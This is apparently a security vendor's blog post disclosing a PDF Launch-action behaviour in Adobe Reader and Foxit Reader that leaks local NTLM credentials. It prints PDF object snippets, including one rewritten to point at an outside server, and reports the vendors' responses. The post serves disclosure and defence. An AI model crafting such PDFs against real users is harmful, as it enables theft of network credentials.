Monday, January 13, 2025

EXPMON detected "zero-day behavior" in PDF samples that leak local (net)NTLM information

In Q4 2024, while reviewing the EXPMON Public analysis data, I discovered an interesting "zero-day behavior" in some PDF samples. I want to emphasize that this was not a zero-day attack — at least for the samples EXPMON analyzed, there is no evidence suggesting they were created with malicious intent. However, the samples exhibited an unpatched, previously unknown behavior when opened with Adobe Reader or Foxit Reader in EXPMON's sandboxes. If this behavior were discovered by a malicious attacker, it could be easily weaponized. This is why I refer to it as "zero-day behavior" rather than a "zero-day attack".

Let's dive into the details using one of the detected samples as an example. For the following particular PDF sample.

PS: The sample is on VT uploaded like two years ago. I've temporarily shared it via Google Drive (zip password "expmon"), for those who want to study it but don't have a VT paid account.

https://pub.expmon.com/analysis/189957/


My analysis showed that the key content of the sample is as the follows.

5 0 obj
  << /Type /Action
     /S /Launch
     /F (/Applications/Calculator.app/Contents/MacOS/Calculator)
  >>
endobj


Issue on Adobe Reader
On Adobe Reader, if the PDF sample is opened directly, the application will attempt to locate a computer named "Applications". If it finds the computer, it will try to connect to the server and send the local (net)NTLM information to it. Although a warning message will appear, the information leak will have already occurred by that point.

An attacker could easily change the server name to a machine under their control and send the PDF file to the victim. When the victim opens the file, the attacker could collect the victim's NTLM information, potentially enabling further attacks.

However, please note that on Adobe Reader, an attacker cannot use a public domain name (FQDN), as it wouldn’t work in this scenario. This has been confirmed by the vendor, Adobe, too. Therefore, this trick has a limitation: the malicious actor must be on the same private network as the victim.


Issue on Foxit Reader
Interestingly, on Foxit Reader, the same sample could not directly trigger the "NTLM leak" behavior as it does in Adobe Reader. However, if we modify the sample to use a public domain name (FQDN) — which fails on Adobe Reader — it works on Foxit Reader!

I made the following minor modification:

5 0 obj
  << /Type /Action
     /S /Launch
     /F (/Applications/Calculator.app/Contents/MacOS/Calculator)
  >>
endobj

Is modified to something like this:

5 0 obj
  << /Type /Action
     /S /Launch
     /F (/pub.expmon.com/test)
  >>
endobj


If we open the modified PDF sample with Foxit Reader, the application will attempt to connect to the server "pub.expmon.com" and send the local (net)NTLM information to the server. Although a warning will appear, the information leak will have already occurred.

An attacker could simply change the name to a server under their control and send the PDF file to the victim. When the victim opens the file, the attacker could collect the victim's local (net)NTLM information.


Vendor Responses
EXPMON immediately reported the findings to both vendors, Adobe and Foxit Software. Below are their responses.

For Adobe Reader, as previously mentioned, Adobe did not consider this a security risk, as it is "not for internet domains".
"The team mentioned that DNS/NTLM calls only for intranet domains, not for internet domains. According to the design, Acrobat considers intranet domains to be trusted when the "Automatically trust sites from Win OS security zones" feature is enabled. This feature is enabled by default in Acrobat."

For Foxit Reader, they've acknowledged this is a security vulnerability and has released a patch addressing the issue in December.

"We are delighted to announce the launch of Foxit PDF Reader for Windows v2024.4, the version have addressed this issue you reported.
The products are available immediately. You are encouraged to download your copy of Foxit PDF Reader from our website.
Reader: https://www.foxit.com/pdf-reader/  
Security Bulletins: https://www.foxit.com/support/security-bulletins.html   
Thanks for your continuous support of our product security."


Conclusion

As described in our Methodology & Architecture, EXPMON employs an approach/cycle like this: big data analytics → identify missed threats → improve detection. Even though a novel zero-day threat may not be detected immediately, future Big Data Analytics (BDA) allow us to identify the threat and improve detection. This finding is a good example of the power of the BDA analysis and why EXPMON is capable of detecting the most undetected file-based zero-day exploits.

If you're interested in advanced exploit detection collaborations or just want to learn more about EXPMON, feel free to reach out to us on Twitter/X at @EXPMON_ or email us at contact@expmon.com. The EXPMON system could be deployed on-premise in internal networks as an advanced tool to combat unknown and zero-day threats.


No comments:

Post a Comment